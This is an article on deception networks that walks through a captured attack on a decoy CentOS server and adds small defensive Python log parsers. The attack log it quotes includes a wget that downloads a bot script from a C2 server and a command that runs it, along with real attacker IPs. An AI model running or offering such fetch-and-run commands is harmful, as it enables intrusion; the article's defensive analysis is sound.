Next Generation Tools: Deception Networks

There have been several predictions as to where adversary hacking is headed in the foreseeable future. Virtually all credible predictions have one thing in common: emerging attacks will be intelligent. In simple terms that means that these attacks will have the ability to make decisions and, to some extent, control their own actions without the support of a bot herder or other human control entity. Some analysts believe that, because this new generation of malcode operates at machine speed, it will be virtually impossible for humans to react fast enough to have any impact on the attack.

One example that has been floated by cyber experts is TrickBot. TrickBot is best known as a banking credential stealer and is often distributed through spam campaigns. Recently, Darktrace released a research report that speculated on some ways that current malware could be enhanced with AI. The report describes three scenarios using different malware types, including TrickBot, as examples.

Their scenario for TrickBot recasts the malware as “autonomous.” That means that the malware, once in the target system, could take over using its own intelligence, rather than requiring instructions from a command and control (C2) server, to learn the target network, the user behavior patterns, the user and email naming conventions, and the network topology and defenses. Clearly, this behavior could occur at machine/network speeds, far beyond the ability of human admins to launch a meaningful response.

Once the malware had learned the victim environment, it could proceed at its own speed to achieve its mission, such as credential stealing. Since an intelligent, machine-learning malware would know when it was being attacked, it could devise effective ways to go dormant until the threat was over and then resume its malicious behavior.

What we are describing here is what scientists studying complexity theory call “emergence.” Emergence refers to “the arising of novel and coherent structures, patterns, and properties during the process of self-organization in complex systems.” Another way to think of emergence is “the ability of individual components of a large system to work together to give rise to dramatic and diverse behavior.”

In other words, once a piece of intelligent malcode is injected into a victim system it develops attack and reconnaissance capabilities on its own through an "emergent" process driven by artificial intelligence and machine learning.

The only effective way to combat this type of attack is to meet it head-on with similarly intelligent defensive tools. Although it sounds a bit Star Wars-ish, what we will have, then, is a war of bots conducted within the target/victim system.

Enter The Deception Network

The idea behind a deception network is to allow the malcode's emergent process to continue while monitoring it, analyzing it forensically and documenting it, all without endangering the production network of the target. There are several ways to do that and each one has its proponents.

The oldest method is the honeypot or collections of honeypots called honeynets. These rather primitive tools lure the attacker into something that looks like a real network and then analyze the attacker's behavior. The problem here is that most attackers have mechanisms to detect the presence of honeynets and avoid them.

Another method is to embed the deception network in the production network and lure the attacker into the deception network by making it indistinguishable from the production network, while protecting the production network should the attacker find his way in.

The third method is to overlay the deception network on the production network such that the attacker believes he is in a legitimate device (and, in a sense, he is). The attacker is allowed to attempt compromise while the deception network collects data about the attack and guides the attacker away from the production system into a safe /dev/null environment.

The system we use in our lab is the BOTSink 3200 appliance from Attivo. This is sort of a mix of the two methods above in that there is a deception network of decoys coexisting with the production network. Through a collection of deceptive tools such as documents, email users, passwords, decoy devices and other tools consistent with the production network, the attacker is confused and is drawn to the decoys. For the purposes of this article, this is the tool we will use although, as we have said, there are others. The best way to illustrate a deception network and its application is to present a use case, here, our research application.

Figure 1 shows an overall view of one week of activity on our network. Note that the external IPs are connected to port 5 of the BOTSink and they have attracted a lot of attack and probe traffic. Our internal network is connected to port 6 and no attacks during the period have made it into the protected network. We are using decoys built on a couple of flavors of Windows and CentOS. The decoys actually are ports on the virtual machines (the Windows and CentOS VMs). The internal machines are both real and decoys. It is nearly impossible for an attacker to tell the difference.

[Figure 1 - One Week of Activity on Our Deception Network]

We have several research applications of the BOTSink in our lab, one of which is an open Internet connection with dozens of "exposed" devices (actually all decoys) that guide the attacker into a sinkhole. We have forensics so that we can analyze the behavior of attackers as they move laterally through our network, or so they think. Figure 2 shows a typical week of attacks against our Internet-facing web server decoy.

[Figure 2 - Attacks Against Our Deception Network]

The computer in the center of the figure - 108.x.x.x - is our decoy web server. It is a virtual machine built on a CentOS virtual host. The 17 attackers around the outside have been lured into attacking the decoy and we have gathered quite a bit of information about them, all the time guiding them away from any legitimate devices on our internal network. In each case the attacker has been successful in penetrating the decoy. Let's look at how.

Let's take an example from earlier in the year - 30 July 2019 to be accurate. We saw several attacks against our CentOS web server from an IP in France (178.19.130.191). See Figure 3 for BOTSink details.

[Figure 3 - Attacks from 178.19.130.191 in France]

The attack is described as:

Deceptive Credential Usage ( SSHD authentication success: user: admin; Jul 30 11:57:13 CentOS70 sshd[13247]: Accepted password for admin from 178.19.130.191 port 53430 ssh2 Source Domain Name [191.130.19.178.abo.tutor.fr] )

This means that the attacker used deceptive credentials to penetrate our server as the user admin. Deceptive credentials are ones we set up for that account that do not work anywhere else in the real network. Therefore, if we see those credentials attempted against any device - real or decoy - we know that there is malicious intent. All of this misdirection occurs at network/device speed and without any human defender involved.
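The check described above can be sketched in a few lines of Python. This is a minimal illustration rather than how BOTSink works internally: the DECOY_USERS set and the find_decoy_logins helper are hypothetical names of our own, and for simplicity the sketch treats a successful login to a decoy-only account name as the signal, since sshd does not log the password itself.

```python
import re

# Hypothetical list of decoy-only account names. "admin" is the account
# named in the log line quoted in the article; a real list would come
# from whatever the deception platform has planted.
DECOY_USERS = {"admin"}

# Matches OpenSSH "Accepted password" lines like the one quoted above.
ACCEPTED = re.compile(
    r"sshd\[\d+\]: Accepted password for (?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port (?P<port>\d+)"
)

def find_decoy_logins(lines, decoy_users=DECOY_USERS):
    """Return (user, source_ip, source_port) for each successful decoy-account login."""
    hits = []
    for line in lines:
        match = ACCEPTED.search(line)
        if match and match.group("user") in decoy_users:
            hits.append(
                (match.group("user"), match.group("ip"), int(match.group("port")))
            )
    return hits

sample = [
    "Jul 30 11:57:13 CentOS70 sshd[13247]: Accepted password for admin "
    "from 178.19.130.191 port 53430 ssh2",
]
print(find_decoy_logins(sample))
```

Because the decoy account has no legitimate use, any hit from this kind of filter can be treated as malicious without further triage.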

It is, of course, not enough to know that the attacker was successful in penetrating the device. We see hundreds of successful penetration attempts per week on our system in which the attacker never takes the attack beyond penetration. From that we surmise that these are automated attacks that simply collect information without attempting to compromise the target.

Our next step is to look closely at what the attacker actually did once he penetrated the target. By extracting the activity report from BOTSink, we get the results in Figure 4.

[Figure 4 - BOTSink Activity Listing]

Note the last two lines in Figure 4 (highlight ours):

10 Attacker from Decoy VM CentOS70 attempting C&C HTTP connection to 203.146.208.208 via squid (web proxy) C&C.

11 Attacker from Decoy VM CentOS70 attempting C&C HTTP connection to 203.146.208.208 via squid (web proxy) C&C.

These tell us that after penetrating the device, the attacker attempts communication with a C2 server in Thailand. Running the IP of the C2 through Cisco Investigate we get:
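For readers who want to pull these fields out of an exported listing, here is a minimal Python sketch. The pattern is inferred only from the two lines quoted above, so treat it as an assumption about the text layout rather than a documented BOTSink format; parse_c2_events is a hypothetical helper name.

```python
import re

# Pattern inferred from the two activity lines quoted in the article.
# Real exports may be laid out differently.
EVENT = re.compile(
    r"Attacker from Decoy VM (?P<decoy>\S+) attempting C&C "
    r"(?P<proto>\S+) connection to (?P<dest>\d{1,3}(?:\.\d{1,3}){3})"
)

def parse_c2_events(lines):
    """Return one dict (decoy, proto, dest) per line that reports a C&C attempt."""
    events = []
    for line in lines:
        match = EVENT.search(line)
        if match:
            events.append(match.groupdict())
    return events

activity = [
    "10 Attacker from Decoy VM CentOS70 attempting C&C HTTP connection to "
    "203.146.208.208 via squid (web proxy) C&C.",
    "11 Attacker from Decoy VM CentOS70 attempting C&C HTTP connection to "
    "203.146.208.208 via squid (web proxy) C&C.",
]
for event in parse_c2_events(activity):
    print(event)
```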

Prefix: 203.146.128.0/17

ASN: AS 4750

Network Owner Description: CSLOXINFO-AS-AP CS LOXINFO PUBLIC COMPANY LIMITED, TH 86400
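As a quick sanity check that the C2 address really falls inside the announced prefix, the standard-library ipaddress module is enough. This is only a sketch; the in_prefix helper is a name of our own.

```python
import ipaddress

def in_prefix(ip, prefix):
    """Return True if the address falls inside the given CIDR prefix."""
    return ipaddress.ip_address(ip) in ipaddress.ip_network(prefix)

# The C2 address and the prefix reported for it in the article.
print(in_prefix("203.146.208.208", "203.146.128.0/17"))
```

The /17 covers 203.146.128.0 through 203.146.255.255, so the C2 address sits inside it. The same one-line test is handy when deciding whether to block a single host or the whole range.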

Earlier in Figure 4, on line 5, we see a wget command: wget https://203.146.208.208/drago/images/.ssh/y.txt

Downloading the file from the server reveals that it is the Perl script used to communicate with the C2. Although the script needs some editing to insert the C2 address and some other details (which we see in lines 6 and 7 of Figure 4), we also see that the communication is via IRC (Internet Relay Chat).

There also is another clue to our attacker. In line 7, he moves y.txt to w.txt, and in line 8 he runs it with an IP address as its argument: perl w.txt 162.243.233.156.

If we look up 162.243.233.156 we see that it is owned by DigitalOcean, a U.S. hosting provider, but the two domains it hosts are Brazilian. Going to the web site we see that it is, indeed, Brazilian: an agricultural site, presumably one that our hacker has taken over. Is the hacker Brazilian? We can't tell at this point, since there are multiple IPs and countries involved, but looking at the code we see that some of it uses words that are either Portuguese or Spanish.
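Pulling indicators such as these IP addresses out of the attacker's command history is easy to automate. The Python sketch below uses only the two commands quoted in this article; extract_ips is a hypothetical helper, and the approach (a loose regular expression followed by validation) is just one reasonable way to do it.

```python
import ipaddress
import re

# Loose dotted-quad pattern. Candidates are validated afterwards so that
# strings such as 999.1.1.1 are rejected.
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def extract_ips(commands):
    """Return unique, valid IPv4 addresses in first-seen order."""
    seen = []
    for command in commands:
        for candidate in IPV4.findall(command):
            try:
                ipaddress.IPv4Address(candidate)
            except ValueError:
                continue  # not a real IPv4 address
            if candidate not in seen:
                seen.append(candidate)
    return seen

# The two attacker commands quoted in the article.
commands = [
    "wget https://203.146.208.208/drago/images/.ssh/y.txt",
    "perl w.txt 162.243.233.156",
]
print(extract_ips(commands))
```

The resulting list can be fed straight into a block list or a reputation lookup.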

What has our deception network done for us that other, current-generation tools cannot? So far it has captured the history of an attack, protected us from the attack and given us more than enough to understand and block those attacks in the future. But there is much more that we can do that we have not done yet.

For example, we can analyze endpoint memory forensically and we can create individualized campaigns, all from within the BOTSink. It also can be quite useful to log into the decoy - in this case our Internet-facing web server - and analyze the attacker's behavior from inside the target. Since the decoy is a virtual machine, we can extract a copy of it and perform an external forensic analysis using our favorite tools.

Although the BOTSink provides us with a large number of pre-configured decoys, we can add decoy VMs of our own and we can modify the configuration of supplied decoys. When we are done with the decoys we can revert to the original snapshot. Many of these functions are typical in one way or another in deception networks. This is important because the real purpose of a deception network is two-fold.

First, we want to protect our production systems. The deception network helps us do that. But, equally important, it allows us to "pre-guess" what types of attacks and strategies might be used against us. That pre-knowledge allows us to set up our defenses such that we see these attacks as soon as they become live threats in the field.

However, we don't have to pre-guess manually (although, of course, we can if we wish) because the deception network does that for us. That is because the deception network behaves much like the smart malcode does. As we can see, the deception network is an emergent system as well.

Because the deception network adjusts to the attacks against it, it is able to defend against emergent attacks simply by learning what is coming at it and how to respond. Not all deception networks are quite there with all of that functionality yet but – and this is nearly as good – they can respond and reroute malicious traffic much faster than a human can. In the case of BOTSink, it does this using two types of campaigns: endpoint and network. In both cases, the tool uses machine learning to mimic the production network and to adjust its environment on the fly.

In a network campaign, the deception network learns directly from network traffic. Understanding what the production network traffic is doing and what it looks like allows the BOTSink to deploy deception elements that look exactly as if they belong in the production network. To the attacker, the two networks are a seamless single entity.

In an endpoint campaign, the same type of learning occurs but with some different specifics. First, the deception network learns from the Active Directory instead of network traffic. It creates lures - decoy entities - that match the production network's AD elements exactly.

Second, it creates endpoint lures that match the environment that the deception network has learned. Those lures can be decoy devices, user accounts (decoy accounts) that look exactly like genuine users, decoy documents that lure the attacker into taking some action such as attempting exfiltration, or decoy email accounts that attract phishing attempts.
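To make the idea of a lure that matches the learned environment concrete, here is a toy Python sketch of generating decoy account names. It is not how BOTSink builds its lures. It assumes a first-initial-plus-surname login convention, and make_decoy_usernames, the sample accounts and the candidate names are all hypothetical.

```python
def make_decoy_usernames(real_users, candidate_names):
    """Build decoy logins in a first-initial-plus-surname style.

    Any login that collides with a real account is skipped, so a decoy
    can never be confused with a genuine user.
    """
    real = {user.lower() for user in real_users}
    decoys = []
    for first, last in candidate_names:
        login = (first[0] + last).lower()
        if login not in real and login not in decoys:
            decoys.append(login)
    return decoys

# Hypothetical production accounts and made-up candidate names.
real_users = ["jsmith", "mgarcia"]
candidates = [("John", "Smith"), ("Laura", "Chen"), ("Omar", "Haddad")]
print(make_decoy_usernames(real_users, candidates))
```

The point of the collision check is the same one made earlier about deceptive credentials: a decoy account must have no legitimate use, so that any activity against it is suspicious by definition.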

The deception network knows what is permitted and, even if malcode is emergent, it can respond and route malicious traffic to decoys, unless, of course, a decoy is attacked directly as in our example. Note that analysts predict next-generation malware and malcode will exhibit much the same kind of deceptive behavior.

Piecing it all together

So where does a deception network fit into your cyber defense strategy? The answer to that is in the first section of this article: it addresses the emergent nature of the next generation of smart malcode and malware.

It works by allowing, but managing, malicious emergence at machine and network speeds: it learns proper behavior and responds to improper behavior. It allows both protection and analysis, leading to the ability to be proactive without regard for the specifics of the next attack.

There are several (but, surprisingly, not many) deception networks on the market. At their core they accomplish the same things, although they do their jobs differently. In our lab environment we have been very happy with the BOTSink but, as they say, your mileage may vary.

Your first task, of course, is to decide if a deception network is the right approach for your environment. They can be a bit taxing to set up but once in operation they take on the heavy lifting of learning the network, the users, the data and the behavior that is necessary to protect the enterprise. This learning process is ongoing.